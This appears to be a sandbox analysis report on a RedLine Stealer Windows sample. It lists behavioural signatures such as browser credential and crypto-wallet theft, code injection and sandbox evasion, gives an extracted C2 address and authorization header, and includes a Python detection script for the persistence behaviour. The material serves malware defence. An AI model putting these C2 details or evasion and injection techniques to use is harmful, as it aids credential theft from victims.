Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Analysis ID: 1537710
MD5: d0cce7870080bd889dba1f4cfd2b3b26
SHA1: a973389aa0908d7b56115aff9cd4878fbd9381f9
SHA256: 8ff3039072ecb32c50f446d6857aceef55547486f0572fe70feb5b1fa4c4727a
Tags: exe, RedLineStealer

Detection

MicroClip, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MicroClip
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect virtual machines
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found hidden mapped module (file has been removed from disk)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites Mozilla Firefox settings
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
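Several of the signatures above map directly onto host telemetry: the Sigma hits (Uncommon Svchost Parent Process, Startup Folder File Write, CurrentVersion Autorun Keys Modification), the hosts-file write, and a system process that then talks to the network. The detection logic below is an added example, not sandbox output, and runs those checks over Sysmon-style events. The events are constructed: pids, the Startup file name and the 192.0.2.10 destination are made up, while the Roaming path and the 176.111.174.140:1912 C2 are taken from this report. The svchost parent allowlist is a trimmed subset of the Sigma rule's (an assumption; extend it from the rule for production use).

```python
"""Detections for the persistence and injection behaviour reported above,
evaluated over Sysmon-style events (constructed sample data, see SAMPLE_EVENTS)."""
import re

# Subset of the parents the Sigma rule allows for svchost.exe (assumption).
SVCHOST_PARENT_ALLOW = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
RUN_KEYS = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
HOSTS_FILE = re.compile(r"\\system32\\drivers\\etc\\hosts$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) findings. Event ids follow Sysmon: 1 process create,
    3 network connect, 11 file create, 13 registry value set."""
    findings = []
    tainted = set()  # pids of svchost.exe instances that failed the parent check
    for e in events:
        if e["id"] == 1 and basename(e["image"]) == "svchost.exe":
            if basename(e["parent"]) not in SVCHOST_PARENT_ALLOW:
                tainted.add(e["pid"])
                findings.append(("Uncommon Svchost Parent Process",
                                 f"pid {e['pid']} parent {e['parent']}"))
            if " -k " not in f" {e['cmd']} ":
                # companion check: services.exe always starts svchost with -k <group>
                findings.append(("Svchost Without -k Group",
                                 f"pid {e['pid']} cmd {e['cmd']!r}"))
        elif e["id"] == 11 and STARTUP_DIR.search(e["target"]):
            findings.append(("Startup Folder File Write", e["target"]))
        elif e["id"] == 11 and HOSTS_FILE.search(e["target"]):
            findings.append(("Hosts File Modification", f"{e['image']} -> {e['target']}"))
        elif e["id"] == 13 and RUN_KEYS.search(e["target"]):
            findings.append(("CurrentVersion Autorun Keys Modification", e["target"]))
        elif e["id"] == 3 and e["pid"] in tainted:
            # the network connect is only interesting once the process is suspect
            findings.append(("System process connects to network",
                             f"pid {e['pid']} -> {e['dst']}"))
    return findings


# Constructed events; pid 1234 is a legitimate service host, pid 4321 mirrors the
# report's behaviour (svchost.exe spawned by the persisted copy, persistence
# writes, hosts-file write, C2 connection on port 1912).
SAMPLE_EVENTS = [
    {"id": 1, "pid": 1234, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmd": "svchost.exe -k netsvcs"},
    {"id": 1, "pid": 4321, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe",
     "cmd": "svchost.exe"},
    {"id": 11, "pid": 4321, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"id": 13, "pid": 4321, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\update"},
    {"id": 11, "pid": 4321, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\drivers\etc\hosts"},
    {"id": 3, "pid": 1234, "image": r"C:\Windows\System32\svchost.exe", "dst": "192.0.2.10:443"},
    {"id": 3, "pid": 4321, "image": r"C:\Windows\System32\svchost.exe", "dst": "176.111.174.140:1912"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The parent check taints a pid so that the later network connect from the same process is raised as a finding while the identical connect from the legitimately started svchost.exe is not; that correlation is what turns "System process connects to network" from noise into a usable alert.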

Classification

Name: RedLine Stealer
Description: RedLine Stealer is malware sold on underground forums, apparently both as a standalone purchase ($100/$150 depending on the version) and on a subscription basis ($100/month). It harvests information from browsers such as saved credentials, autocomplete data and credit card information, and takes a system inventory of the target machine that includes the username, location data, hardware configuration and installed security software. More recent versions added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted, and the malware can upload and download files, execute commands and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Avira: detection malicious, Label: TR/AD.RedLineSteal.yterx
Source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["176.111.174.140:1912"], "Bot Id": "Diamotrix", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe ReversingLabs: Detection: 63%
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe ReversingLabs: Detection: 63%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309132497.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2340109854.00007FF8BFB81000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307880735.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: 7DF0.tmp.zx.exe.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2338790461.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307569047.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
